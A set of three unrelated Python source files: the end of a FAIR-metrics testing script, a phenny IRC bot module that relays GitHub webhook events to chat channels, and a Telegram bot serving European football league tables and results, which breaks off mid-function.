file.write("\n" + test_comment_list)
file.close()
def writeScoreFile(headers_list, test_score_list, output_dir, filename):
"""
Write a line of scores associated to a GUID to a res file, create the file and headers if it doesn't exist yet.
@param test_score_list List Score results for each test (0 or 1)
@param headers_list List Principle of each metric that will be used as headers
@param filename String The name of the output file
"""
logname = "result_metrics_test.log"
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
filename = output_dir + filename
exists = os.path.isfile(filename)
if exists:
file = open(filename, "a")
file.write("\n" + test_score_list)
file.close()
else:
file = open(filename, "w")
file.write(headers_list)
file.write("\n" + test_score_list)
file.close()
def getCurrentTime():
"""
Function returning the current time formated
@return datetime object
"""
return datetime.strptime(time.strftime("%Y-%m-%d %H:%M:%S"), "%Y-%m-%d %H:%M:%S")
def getMetricInfo(metric_url):
"""
Send a request to retrieve additional info about one metric.
@param metric_url String The url where the metric informations are
@return json Result returned by the request that is JSON-LD formated
"""
while True:
try:
response = requests.request(
method="GET",
url=metric_url + ".json",
allow_redirects=True,
timeout=TIMEOUT,
)
result = response.json()
break
except requests.exceptions.Timeout:
time.sleep(5)
except requests.exceptions.ReadTimeout:
time.sleep(20)
except SSLError:
time.sleep(10)
return result
def printTestMetricResult(result, test_time):
"""
A function that send the comments of a metric test against a GUID to the stdout.
@param key
"""
if args.comment:
print("Comment:")
# print(result[0][key][0]['@value'], end='\n\n')
comment = requestResultSparql(result, "schema:comment")
comment = cleanComment(comment)
comment_args = args.comment
comment = filterComment(comment, comment_args)
# mettre boucle dans colorComment
for line in comment.split("\n"):
# if line.startswith('SUCCESS') or line.startswith('FAILURE'):
l = colorComment(line)
print(l, end="\n")
print("")
if args.score:
print("Score:")
print(requestResultSparql(result, "ss:SIO_000300"), end="\n\n")
if args.time:
print("Metric test time:")
print(test_time, end="\n\n")
def filterComment(comment, comment_args):
"""
Select the type of comment to display based on the command line arguments.
@param comment String The comment from the metric test
@return String The filtered comment
"""
association_dict = {
"s": "SUCCESS",
"f": "FAILURE",
"w": "WARN",
"i": "INFO",
"c": "CRITICAL",
}
filtered_comment = []
additional_info = False
for line in comment.split("\n"):
# check if line is not additional info (starts with any associantion_dict value)
for value in association_dict.values():
if line.startswith(value):
additional_info = False
break
for arg in comment_args:
# if line statswith the param value or is additional info, add it to filtered_comment
if line.startswith(association_dict[arg]) or additional_info:
filtered_comment.append(line)
additional_info = True
break
# if additional_info:
# filtered_comment.append(line)
# break
return "\n".join(filtered_comment)
def cleanComment(comment):
"""
Remove empty lines from the comment.
@param comment String The comment about the metric test
@return String The cleaned comment about the metric test
"""
comment = comment.split("\n")
if "" in comment:
comment = [l for l in comment if l != ""]
comment = "\n".join(comment)
return comment
def colorComment(line):
"""
Color some specific terms in the comments in the stdout.
@param line String The comment line to be colored
"""
# dict containing words as key and the associated color as value
association_dict = {
"SUCCESS": "green",
"FAILURE": "red",
"WARN": "yellow",
"INFO": "cyan",
"CRITICAL": "magenta",
}
l = ""
# add the color to the terms if they exists
for key_term, value_color in association_dict.items():
if line.startswith(key_term):
l = line.replace(key_term, termcolor.colored(key_term, value_color))
return l
return line
def printMetricInfo(metric_info):
if (
args.name
or args.principle
or args.description
or args.comment
or args.score
or args.time
):
print("#" * 70, end="\n\n")
if args.name:
print(metric_info["name"], end="\n\n")
if args.principle:
print("Principle: " + metric_info["principle"].rsplit("/", 1)[-1], end="\n\n")
if args.description:
print("Description:")
print(metric_info["description"], end="\n\n")
def getMetrics():
"""
Retrieve general informations of each metrics.
@return json Result returned by the request that is JSON-LD formated
"""
metrics_url = (
"https://fair-evaluator.semanticscience.org/FAIR_Evaluator/metrics.json"
)
while True:
try:
response = requests.get(url=metrics_url, timeout=TIMEOUT)
break
except SSLError:
time.sleep(5)
except requests.exceptions.Timeout:
print("Timeout, retrying")
time.sleep(5)
except requests.exceptions.ConnectionError as e:
print(e)
print("ConnectionError, retrying...")
time.sleep(10)
json_res = response.json()
return json_res
def readDOIsFile(filename):
"""
Read the DOIs from a file input.
@param filename String The inputs DOIs to be tested
"""
with open(filename, "r") as file:
data = file.read()
return data
def webTestMetrics(GUID_test):
global args
args = parser.parse_args()
PRINT_DETAILS = True
args.description = True
args.thread_num = multiprocessing.cpu_count()
args.directory = "web_test_dir"
return testMetrics(GUID_test)
if __name__ == "__main__":
args = parser.parse_args()
PRINT_DETAILS = True
# if len(sys.argv) < 2:
# print("You haven't specified any arguments. Use -h to get more details on how to use this command.")
# sys.exit(1)
# RSAT paper
# GUID_test = "10.1093/nar/gky317"
# Dataset +++
GUID_test = "https://doi.pangaea.de/10.1594/PANGAEA.902591"
# Dataset
# GUID_test = "https://doi.org/10.5061/dryad.615"
# GUID_test = "10.5061/dryad.615"
# GUID_test = "https://www.france-bioinformatique.fr/en"
# GUID_test = "https://fairsharing.org/"
# GUID_test = "https://biit.cs.ut.ee/gprofiler/gost"
# GUID_test = "https://bio.tools/rsat_peak-motifs"
if args.input:
GUID_test = args.input
# !!!! preblematic url !!!!
# GUID_test = "10.1155/2019/2561828"
# GUID_test = "10.1155/2017/3783714"
# GUID_test = "https://identifiers.org/biotools:the_flux_capacitor"
# GUID_test = "10.1002/cpbi.72"
# GUID_test = "10.1093/neuros/nyw135"
# GUID_test = 'https://orcid.org/0000-0002-3597-8557'
# for i in range(0, 10):
results = testMetrics(GUID_test)
|
git.py
|
#!/usr/bin/env python
"""
git.py - Github Post-Receive Hooks Module
"""
import http.server
from threading import Thread
from io import StringIO
import json
import os
import re
import time
import atexit
import signal
from tools import generate_report, PortReuseTCPServer, truncate
import urllib.parse
import web
from modules import more
import logging
logger = logging.getLogger('phenny')
# githooks port
PORT = 1234
# module-global variables
httpd = None
def close_socket():
global httpd
if httpd:
httpd.shutdown()
httpd.server_close()
httpd = None
MyHandler.phenny = None
atexit.register(close_socket)
def signal_handler(signal, frame):
close_socket()
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGQUIT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# githooks handler
class MyHandler(http.server.SimpleHTTPRequestHandler):
phenny = None
def return_data(self, site, data, commit):
'''Generates a report for the specified site and commit.'''
# fields = project name, author, commit message, modified files, added
# files, removed files, revision
fields = []
if site == "github":
fields = [
data['repository']['name'],
data['pusher']['name'],
commit['message'],
commit['modified'],
commit['added'],
commit['removed'],
commit['id'][:7],
]
elif site == "googlecode":
fields = [
data['project_name'],
commit['author'],
commit['message'],
commit['modified'],
commit['added'],
commit['removed'],
commit['revision'],
]
elif site == "bitbucket":
files = self.getBBFiles(commit['files'])
fields = [
'turkiccorpora',
commit['author'],
commit['message'],
files['modified'],
files['added'],
files['removed'],
commit['node'],
]
# the * is for unpacking
return generate_report(*fields)
# return error code because a GET request is meaningless
def do_GET(self):
parsed_params = urllib.parse.urlparse(self.path)
query_parsed = urllib.parse.parse_qs(parsed_params.query)
self.send_response(405)
self.send_header("Content-type", "text/html")
self.end_headers()
def do_POST(self):
'''Handles POST requests for all hooks.'''
try:
# read and decode data
logger.debug('payload received; headers: '+str(self.headers))
length = int(self.headers['Content-Length'])
indata = self.rfile.read(length)
post_data = urllib.parse.parse_qs(indata.decode('utf-8'))
if len(post_data) == 0:
post_data = indata.decode('utf-8')
if "payload" in post_data:
data = json.loads(post_data['payload'][0])
else:
data = json.loads(post_data)
except Exception as error:
logger.error('Error 400 (no valid payload)')
logger.error(str(error))
self.send_response(400)
self.send_header("Content-type", "text/html")
self.end_headers()
for channel in self.phenny.config.channels:
self.phenny.msg(channel, 'Webhook received malformed payload')
return
try:
self.do_POST_unsafe(data)
except Exception as error:
try:
commits = [commit['url'] for commit in data['commits']]
logger.error('Error 501 (commits were ' + ', '.join(commits) + ')')
except:
logger.error('Error 501 (commits unknown or malformed)')
logger.error(str(data))
logger.error(str(error))
self.send_response(501)
self.send_header("Content-type", "text/html")
self.end_headers()
for channel in self.phenny.config.channels:
self.phenny.msg(channel, 'Webhook received problematic payload')
def do_POST_unsafe(self, data):
# will contain both commit reports and error reports
msgs_by_channel = {}
msgs_default_channels = []
repo = ''
event = None
silent_on_purpose = False
# handle GitHub triggers
if 'GitHub' in self.headers['User-Agent']:
event = self.headers['X-Github-Event']
user = data['sender']['login']
if 'repository' in data:
repo = data['repository']['name']
elif 'organization' in data:
repo = data['organization']['login'] + ' (org)'
if event == 'commit_comment':
commit = data['comment']['commit_id'][:7]
url = data['comment']['html_url']
url = url[:url.rfind('/') + 7]
action = data['action']
if action == 'deleted':
template = '{:}: {:} * comment deleted on commit {:}: {:}'
msgs_default_channels.append(template.format(repo, user, commit, url))
else:
template = '{:}: {:} * comment {:} on commit {:}: {:} {:}'
comment = truncate(
data['comment']['body'],
template.format(repo, user, action, commit, '', url)
)
msgs_default_channels.append(template.format(repo, user, action, commit, comment, url))
elif event == 'create' or event == 'delete':
template = '{:}: {:} * {:} {:} {:}d {:}'
ref = data['ref']
type_ = data['ref_type']
msgs_default_channels.append(template.format(repo, user, type_, ref, event))
elif event == 'fork':
template = '{:}: {:} forked this repo {:}'
url = data['forkee']['html_url']
msgs_default_channels.append(template.format(repo, user, url))
elif event == 'issue_comment':
if 'pull_request' in data['issue']:
url = data['issue']['pull_request']['html_url']
text = 'pull request'
else:
url = data['issue']['html_url']
text = 'issue'
number = data['issue']['number']
action = data['action']
if action == 'deleted':
template = '{:}: {:} * comment deleted on {:} #{:}: {:}'
msgs_default_channels.append(template.format(repo, user, text, number, url))
else:
template = '{:}: {:} * comment {:} on {:} #{:}: {:} {:}'
comment = truncate(
data['comment']['body'],
template.format(repo, user, action, text, number, '', url)
)
msgs_default_channels.append(template.format(repo, user, action, text, number, comment, url))
elif event == 'issues':
template = '{:}: {:} * issue #{:} "{:}" {:} {:} {:}'
number = data['issue']['number']
title = data['issue']['title']
action = data['action']
url = data['issue']['html_url']
opt = ''
if data['issue']['assignee']:
opt += 'assigned to ' + data['issue']['assignee']['login']
elif 'label' in data:
opt += 'with ' + data['label']['name']
msgs_default_channels.append(template.format(repo, user, number, title, action, opt, url))
elif event == 'member':
template = '{:}: {:} * user {:} {:} as collaborator {:}'
new_user = data['member']['login']
action = data['action']
msgs_default_channels.append(template.format(repo, user, new_user, action))
elif event == 'membership':
template = '{:}: user {:} {:} {:} {:} {:} {:}'
new_user = data['member']['login']
action = data['action']
prep = ['to', 'from'][int(action == 'removed')]
scope = data['scope']
name = data['team']['name']
msgs_default_channels.append(template.format(repo, new_user, action, prep, scope, name))
elif event == 'pull_request':
template = '{:}: {:} * pull request #{:} "{:}" {:} {:} {:}'
number = data['number']
title = data['pull_request']['title']
action = data['action']
url = data['pull_request']['html_url']
opt = ''
if data['pull_request']['assignee']:
opt = 'to ' + data['pull_request']['assignee']
msgs_default_channels.append(template.format(repo, user, number, title, action, opt, url))
elif event == 'pull_request_review_comment':
template = '{:}: {:} * review comment deleted on pull request #{:}: {:}'
number = data['pull_request']['number']
url = data['comment']['html_url']
action = data['action']
if action == 'deleted':
msgs_default_channels.append(template.format(repo, user, number, url))
else:
template = '{:}: {:} * review comment {:} on pull request #{:}: {:} {:}'
comment = truncate(
data['comment']['body'],
template.format(repo, user, action, number, '', url)
)
msgs_default_channels.append(template.format(repo, user, action, number, comment, url))
elif event == 'push':
template = '{:}: {:} * {:}: {:} {:}'
ref = data['ref'].split('/')[-1]
repo_fullname = data['repository']['full_name']
fork = data['repository']['fork']
try:
branch_channels = self.phenny.config.branch_channels[repo_fullname][ref]
except:
branch_channels = []
for commit in data['commits']:
non_trunc = template.format(
data['repository']['name'], data['pusher']['name'],
', '.join(commit['modified'] + commit['added']),
'{:}',
commit['url'][:commit['url'].rfind('/') + 7]
)
message = non_trunc.format(truncate(commit['message'], non_trunc.format('')))
if ref == 'master' and not fork:
msgs_default_channels.append(message)
elif branch_channels:
for channel in branch_channels:
if channel in msgs_by_channel:
msgs_by_channel[channel].append(message)
else:
msgs_by_channel[channel] = [message]
else:
silent_on_purpose = True
elif event == 'release':
template = '{:}: {:} * release {:} {:} {:}'
tag = data['release']['tag_name']
action = data['action']
url = data['release']['html_url']
msgs_default_channels.append(template.format(repo, user, tag, action, url))
elif event == 'repository':
template = 'new repository {:} {:} by {:} {:}'
name = data['repository']['name']
action = data['action']
url = data['repository']['url']
msgs_default_channels.append(template.format(name, action, user, url, url))
elif event == 'team_add':
template = 'repository {:} added to team {:} {:}'
name = data['repository']['full_name']
team = data['team']['name']
msgs_default_channels.append(template.format(name, team))
elif event == 'ping':
template = 'ping from {:}, org: {:}'
if 'organization' in data:
org = data['organization']
else:
org = "no org specified!"
sender = data['sender']['login']
msgs_default_channels.append(template.format(sender, org))
else:
msgs_default_channels.append('sorry, event {:} not supported yet.'.format(event))
msgs_default_channels.append(str(data.keys()))
elif 'Jenkins' in self.headers['User-Agent']:
msgs_default_channels.append('Jenkins: {}'.format(data['message']))
# not github or Jenkins
elif "commits" in data:
for commit in data['commits']:
try:
if "author" in commit:
# for bitbucket
message = self.return_data("bitbucket", data, commit)
msgs_default_channels.append(message)
else:
# we don't know which site
message = "unsupported data: " + str(commit)
msgs_default_channels.append(message)
except Exception:
logger.warning("unsupported data: " + str(commit))
if (not msgs_by_channel) and (not msgs_default_channels) and (not silent_on_purpose):
# we couldn't get anything
if event:
msgs_default_channels.append("Don't know about '" + event + "' events")
else:
msgs_default_channels.append("Unable to deal with unknown event")
# post all messages to all channels
# except where specified in the config
try:
default_channels = self.phenny.config.git_channels[repo]
except:
default_channels = self.phenny.config.channels
for message in msgs_default_channels:
for channel in default_channels:
if channel in msgs_by_channel:
msgs_by_channel[channel].append(message)
else:
msgs_by_channel[channel] = [message]
for channel in msgs_by_channel.keys():
more.add_messages(self.phenny, channel, msgs_by_channel[channel])
# send OK code
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
def getBBFiles(self, filelist):
'''Sort filelist into added, modified, and removed files
(only for bitbucket).'''
toReturn = {"added": [], "modified": [], "removed": []}
for onefile in filelist:
toReturn[onefile['type']].append(onefile['file'])
return toReturn
def setup_server(phenny):
'''Set up and start hooks server.'''
global httpd
if not httpd:
MyHandler.phenny = phenny
httpd = PortReuseTCPServer(("", PORT), MyHandler)
Thread(target=httpd.serve_forever).start()
phenny.say("Server is up and running on port %s" % PORT)
def auto_start(phenny, input):
if input.nick != phenny.nick:
return
if phenny.config.githook_autostart:
setup_server(phenny)
auto_start.rule = '(.*)'
auto_start.event = 'JOIN'
def teardown(phenny):
close_socket()
phenny.say("Server has stopped on port %s" % PORT)
def gitserver(phenny, input):
'''Control git server. Possible commands are:
.gitserver status (all users)
.gitserver start (admins only)
.gitserver stop (admins only)'''
global httpd
command = input.group(1).strip()
if input.admin:
# we're admin
# everwhere below, 'httpd' being None indicates that the server is not
# running at the moment
if command == "stop":
if httpd is not None:
teardown(phenny)
else:
phenny.reply("Server is already down!")
elif command == "start":
if httpd is None:
setup_server(phenny)
else:
phenny.reply("Server is already up!")
elif command == "status":
if httpd is None:
phenny.reply("Server is down! Start using '.gitserver start'")
else:
phenny.reply("Server is up! Stop using '.gitserver stop'")
else:
phenny.reply("Usage '.gitserver [status | start | stop]'")
else:
if command == "status":
if httpd is None:
phenny.reply("Server is down! (Only admins can start it up)")
else:
phenny.reply(("Server is up and running! "
"(Only admins can shut it down)"))
else:
phenny.reply("Usage '.gitserver [status]'")
# command metadata and invocation
gitserver.name = "gitserver"
gitserver.rule = ('.gitserver', '(.*)')
def get_commit_info(phenny, repo, sha):
'''Get commit information for a given repository and commit identifier.'''
repoUrl = phenny.config.git_repositories[repo]
if repoUrl.find("code.google.com") >= 0:
locationurl = '/source/detail?r=%s'
elif repoUrl.find("api.github.com") >= 0:
locationurl = '/commits/%s'
elif repoUrl.find("bitbucket.org") >= 0:
locationurl = ''
html = web.get(repoUrl + locationurl % sha)
# get data
data = json.loads(html)
author = data['commit']['committer']['name']
comment = data['commit']['message']
# create summary of commit
modified_paths = []
added_paths = []
removed_paths = []
for file in data['files']:
if file['status'] == 'modified':
modified_paths.append(file['filename'])
elif file['status'] == 'added':
added_paths.append(file['filename'])
elif file['status'] == 'removed':
removed_paths.append(file['filename'])
# revision number is first seven characters of commit indentifier
rev = sha[:7]
# format date
date = time.strptime(data['commit']['committer']['date'],
"%Y-%m-%dT%H:%M:%SZ")
date = time.strftime("%d %b %Y %H:%M:%S", date)
url = data['html_url']
return (author, comment, modified_paths, added_paths, removed_paths,
rev, date), url
def get_recent_commit(phenny, input):
'''Get recent commit information for each repository Begiak monitors. This
command is called as 'begiak: recent'.'''
for repo in phenny.config.git_repositories:
html = web.get(phenny.config.git_repositories[repo] + '/commits')
data = json.loads(html)
# the * is for unpacking
info, url = get_commit_info(phenny, repo, data[0]['sha'])
msg = generate_report(repo, *info)
# the URL is truncated so that it has at least 6 sha characters
url = url[:url.rfind('/') + 7]
phenny.say('{:s} {:s}'.format(truncate(msg, ' ' + url), url))
# command metadata and invocation
get_recent_commit.rule = ('$nick', 'recent')
get_recent_commit.priority = 'medium'
get_recent_commit.thread = True
def retrieve_commit(phenny, input):
'''Retreive commit information for a given repository and revision. This
command is called as 'begiak: info <repo> <rev>'.'''
# get repo and rev with regex
data = input.group(1).split(' ')
if len(data) != 2:
phenny.reply("Invalid number of parameters.")
return
repo = data[0]
rev = data[1]
if repo in phenny.config.svn_repositories:
# we don't handle SVN; see modules/svnpoller.py for that
return
if repo not in phenny.config.git_repositories:
phenny.reply("That repository is not monitored by me!")
return
try:
info, url = get_commit_info(phenny, repo, rev)
except:
phenny.reply("Invalid revision value!")
return
# the * is for unpacking
msg = generate_report(repo, *info)
# the URL is truncated so that it has at least 6 sha characters
url = url[:url.rfind('/') + 7]
phenny.say('{:s} {:s}'.format(truncate(msg, ' ' + url), url))
# command metadata and invocation
retrieve_commit.rule = ('$nick', 'info(?: +(.*))')
|
bot.py
|
"""
## Programm structure
bot.py handles all the messages users send to bot. Then it uses `AnswerGenerator`
to get the reply to user's command. This file contains message handlers.
## Executing the bot
To execute, you need to provide bot's `API_TOKEN` using environment variable.
In Linux:
```
export API_TOKEN=xxx
```
Then just run bot.py:
```
python3 ./bot.py
```
---
"""
import telebot
import psycopg2
import threading
from random import choice, shuffle
from decouple import config
from time import sleep
from football import gen_player
from leagues.league_table import ChampionshipTable
from leagues.league_scores import ChampionshipScores
from leagues.league_latest import ChampionshipLatest
try:
db = psycopg2.connect(config('DATABASE_URL'))
cursor = db.cursor()
# Print PostgreSQL Connection properties
print(db.get_dsn_parameters(), "\n")
# Print PostgreSQL version
cursor.execute("SELECT version();")
record = cursor.fetchone()
print("You are connected to - ", record, '\n')
# Create Users Table
cursor.execute('CREATE TABLE IF NOT EXISTS users (id SERIAL, userId VARCHAR NOT NULL);')
db.commit()
print("Table created successfully in PostgreSQL!")
except Exception as error:
print("Error occurred", error)
# New Bot Instance
bot = telebot.TeleBot(config('API_TOKEN'))
print("Bot is running")
BOT_INTERVAL = int(config('BOT_INTERVAL'))
BOT_TIMEOUT = int(config('BOT_TIMEOUT'))
def bot_polling():
while True:
try:
print("Starting bot polling now. New bot instance started!")
bot.polling(none_stop=True, interval=BOT_INTERVAL, timeout=BOT_TIMEOUT)
except Exception as ex:
print("Bot polling failed, restarting in {}sec. Error:\n{}".format(BOT_TIMEOUT, ex))
bot.stop_polling()
sleep(BOT_TIMEOUT)
else:
bot.stop_polling()
print("Bot polling loop finished.")
break
# Welcome Menu
@bot.message_handler(commands=['start'])
def send_welcome(m):
"""[note]:
Handles the **/start** comand."""
try:
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('⚽ Check Statistics', 'ℹ️ Help')
user_markup.row('⚽ Start the Game')
from_user = [m.from_user.id]
cursor.execute('SELECT EXISTS(SELECT userId FROM users WHERE "userid" = CAST(%s AS VARCHAR))', from_user)
check = cursor.fetchone()
if not check[0]:
cursor.execute('INSERT INTO users (userId) VALUES (%s)', from_user)
db.commit()
count = cursor.rowcount
print(count, "Record inserted successfully into users table")
else:
count = cursor.rowcount
print(count, "Record already exists")
start_msg = 'Hey *{}* 👋, I\'m *FootGuessr Bot* 🤖!\n\n' \
'With my help you can play the game to guess 🤔 the player\'s name from their statistics.\n\n' \
'Also you can see:\n\t\t\t- results of football events ⚽' \
'\n\t\t\t- statistics of different leagues 📈' \
'\n\t\t\t- statistics of players 🏃🏽♀️\n\n' \
'Player data is taken from [Wiki](https://en.wikipedia.org/wiki/Main_Page).\n' \
'Football stats from [Livescores](livescores.com).\n\n' \
'Press any button below to interact with me 😀\n\n' \
'Made by *@gorik333* '
bot.send_message(m.chat.id, start_msg.format(m.from_user.first_name), reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
except Exception as error:
print("Error occurred", error)
# Main Menu
@bot.message_handler(regexp="👈 Main Menu")
def main_menu(m):
"""[note]:
Handles the **/Main Menu** button.
"""
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('⚽ Check Statistics', 'ℹ️ Help')
user_markup.row('⚽ Start the Game')
user_msg = 'Return to the main menu.\n\n'
bot.send_message(m.chat.id, user_msg, reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
# Help Menu
@bot.message_handler(regexp="ℹ️ Help")
def command_help(m):
"""[note]:
Handles the **/Help** button.
"""
help_text = "*FootGuessr Bot* 🤖: Send a private message to one of my creators *@gorik333*, " \
"if you need help with something."
bot.send_message(m.chat.id, help_text, parse_mode='Markdown', disable_web_page_preview="True")
# Football Stat Menu
@bot.message_handler(regexp="⚽ Check Statistics")
def send_football(m):
"""[note]:
Handles the choosing of league
"""
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('🏴 England', '🇪🇸 Spain')
user_markup.row('🇩🇪 Germany', '🇫🇷 France')
user_markup.row('🇮🇹 Italy', '🇺🇦 Ukraine')
user_markup.row('👈 Main Menu')
user_msg = 'Football Statistics from Top-Leagues 🔝 in Europe 🇪🇺\n\n'
bot.send_message(m.chat.id, user_msg, reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
# Back to Main Football Menu
@bot.message_handler(regexp="👈 Back")
def football_back(m):
"""[note]:
Handles the Back button
"""
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('🏴 England', '🇪🇸 Spain')
user_markup.row('🇩🇪 Germany', '🇫🇷 France')
user_markup.row('🇮🇹 Italy', '🇺🇦 Ukraine')
user_markup.row('👈 Main Menu')
user_msg = 'Return to Main Football Menu.\n\n'
bot.send_message(m.chat.id, user_msg, reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
# ============== English Premier League ==============
@bot.message_handler(regexp="🏴 England")
def send_england(m):
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('⚽ Premier League Table', '⚽ Premier League Upcoming Events')
user_markup.row('⚽ Premier League Latest Results', '👈 Back')
user_msg = 'English Premier League Table and Scores.\n\n'
bot.send_message(m.chat.id, user_msg, reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
# Premier League Table
@bot.message_handler(regexp="⚽ Premier League Table")
def send_en_table(message):
url = "http://www.livescores.com/soccer/england/premier-league/"
user_msg = ChampionshipTable(url, table_width=9, table_height=21).create_table()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# Premier League Scores
@bot.message_handler(regexp="⚽ Premier League Upcoming Events")
def send_en_scores(message):
url = "http://www.livescores.com/soccer/england/premier-league/"
user_msg = ChampionshipScores(url).scrape_score()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# Premier League Results (Last Week)
@bot.message_handler(regexp="⚽ Premier League Latest Results")
def send_en_latest(message):
url = "http://www.livescores.com/soccer/england/premier-league/results/7-days/"
user_msg = ChampionshipLatest(url).parse_latest()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# ============== Spanish La Liga ==============
@bot.message_handler(regexp="🇪🇸 Spain")
def send_spain(m):
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('⚽ La Liga Table', '⚽ La Liga Upcoming Events')
user_markup.row('⚽ La Liga Latest Results', '👈 Back')
user_msg = 'Spanish La Liga Table and Scores.\n\n'
bot.send_message(m.chat.id, user_msg, reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
# La Liga Table
@bot.message_handler(regexp="⚽ La Liga Table")
def send_es_table(message):
url = "http://www.livescores.com/soccer/spain/primera-division/"
user_msg = ChampionshipTable(url, table_width=9, table_height=21).create_table()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# La Liga Scores
@bot.message_handler(regexp="⚽ La Liga Upcoming Events")
def send_es_scores(message):
url = "http://www.livescores.com/soccer/spain/primera-division/"
user_msg = ChampionshipScores(url).scrape_score()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# La Liga Results (Last Week)
@bot.message_handler(regexp="⚽ La Liga Latest Results")
def send_es_latest(message):
url = "http://www.livescores.com/soccer/spain/primera-division/results/7-days/"
user_msg = ChampionshipLatest(url).parse_latest()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# ============== German Bundesliga ==============
@bot.message_handler(regexp="🇩🇪 Germany")
def send_germany(m):
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('⚽ Bundesliga Table', '⚽ Bundesliga Upcoming Events')
user_markup.row('⚽ Bundesliga Latest Results', '👈 Back')
user_msg = 'German Bundesliga Table and Scores.\n\n'
bot.send_message(m.chat.id, user_msg, reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
# Bundesliga Table
@bot.message_handler(regexp="⚽ Bundesliga Table")
def send_de_table(message):
url = "http://www.livescores.com/soccer/germany/bundesliga/"
user_msg = ChampionshipTable(url, table_width=9, table_height=19).create_table()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# Bundesliga Scores
@bot.message_handler(regexp="⚽ Bundesliga Upcoming Events")
def send_de_scores(message):
url = "http://www.livescores.com/soccer/germany/bundesliga/"
user_msg = ChampionshipScores(url).scrape_score()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# Bundesliga Results (Last Week)
@bot.message_handler(regexp="⚽ Bundesliga Latest Results")
def send_de_latest(message):
url = "http://www.livescores.com/soccer/germany/bundesliga/results/7-days/"
user_msg = ChampionshipLatest(url).parse_latest()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# ============== French Ligue 1 ==============
@bot.message_handler(regexp="🇫🇷 France")
def send_france(m):
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('⚽ Ligue 1 Table', '⚽ Ligue 1 Upcoming Events')
user_markup.row('⚽ Ligue 1 Latest Results', '👈 Back')
user_msg = 'French Ligue 1 Table and Scores.\n\n'
bot.send_message(m.chat.id, user_msg, reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
# Ligue 1 Table
@bot.message_handler(regexp="⚽ Ligue 1 Table")
def send_fr_table(message):
url = "http://www.livescores.com/soccer/france/ligue-1/"
user_msg = ChampionshipTable(url, table_width=9, table_height=21).create_table()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# Ligue 1 Scores
@bot.message_handler(regexp="⚽ Ligue 1 Upcoming Events")
def send_fr_scores(message):
url = "http://www.livescores.com/soccer/france/ligue-1/"
user_msg = ChampionshipScores(url).scrape_score()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# Ligue 1 Results (Last Week)
@bot.message_handler(regexp="⚽ Ligue 1 Latest Results")
def send_fr_latest(message):
url = "http://www.livescores.com/soccer/france/ligue-1/results/7-days/"
user_msg = ChampionshipLatest(url).parse_latest()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# ============== Italian Serie A ==============
@bot.message_handler(regexp="🇮🇹 Italy")
def send_italy(m):
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('⚽ Serie A Table', '⚽ Serie A Upcoming Events')
user_markup.row('⚽ Serie A Latest Results', '👈 Back')
user_msg = 'Italian Serie A Table and Scores.\n\n'
bot.send_message(m.chat.id, user_msg, reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
# Serie A Table
@bot.message_handler(regexp="⚽ Serie A Table")
def send_it_table(message):
url = "http://www.livescores.com/soccer/italy/serie-a/"
user_msg = ChampionshipTable(url, table_width=9, table_height=21).create_table()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# Serie A Scores
@bot.message_handler(regexp="⚽ Serie A Upcoming Events")
def send_it_scores(message):
url = "http://www.livescores.com/soccer/italy/serie-a/"
user_msg = ChampionshipScores(url).scrape_score()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# Serie A Results (Last Week)
@bot.message_handler(regexp="⚽ Serie A Latest Results")
def send_it_latest(message):
url = "http://www.livescores.com/soccer/italy/serie-a/results/7-days/"
user_msg = ChampionshipLatest(url).parse_latest()
bot.reply_to(message, user_msg, parse_mode="Markdown", disable_web_page_preview="True")
# ============== Ukrainian Premier League ==============
@bot.message_handler(regexp="🇺🇦 Ukraine")
def send_ukraine(m):
user_markup = telebot.types.ReplyKeyboardMarkup(True, True)
user_markup.row('⚽ UPL Table', '⚽ UPL Upcoming Events')
user_markup.row('⚽ UPL Latest Results', '👈 Back')
user_msg = 'Ukrainian Premier League Table and Scores.\n\n'
bot.send_message(m.chat.id, user_msg, reply_markup=user_markup,
parse_mode="Markdown", disable_web_page_preview="True")
# UPL Table
@bot.message_handler(regexp="⚽ UPL Table")
def send_ua_table(message):
url = "https://www.livescores.com/soccer/ukraine/premier-league/"
